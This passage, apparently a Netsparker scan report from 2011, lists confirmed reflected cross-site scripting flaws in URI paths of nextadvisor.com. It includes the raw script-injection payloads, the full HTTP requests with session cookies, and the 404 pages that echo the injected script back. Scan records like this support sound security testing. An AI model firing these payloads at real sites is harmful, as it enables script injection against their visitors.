Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:50 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3528
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/privacy.php'"--></style></script><script>netsparker(0x0003DC)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003DC)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>

/affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(..

Parameters

Parameter: URI-BASED
Type: Raw URI
Value: '"--></style></script><script>alert(0x0003FA)</script>

Request

GET /affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003FA)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3528
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/affiliate_program.php'"--></style></script><script>netsparker(0x0003FA)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003FA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>

/sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%..

Parameters

Parameter: URI-BASED
Type: Raw URI
Value: '"--></style></script><script>alert(0x0003FE)</script>

Request

GET /sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003FE)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:59:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3530
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/sitemap.php'"--></style></script><script>netsparker(0x0003FE)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) 
}catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option 
value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0003FE)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" 
value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> 
</div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>

/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/script%3E CONFIRMED

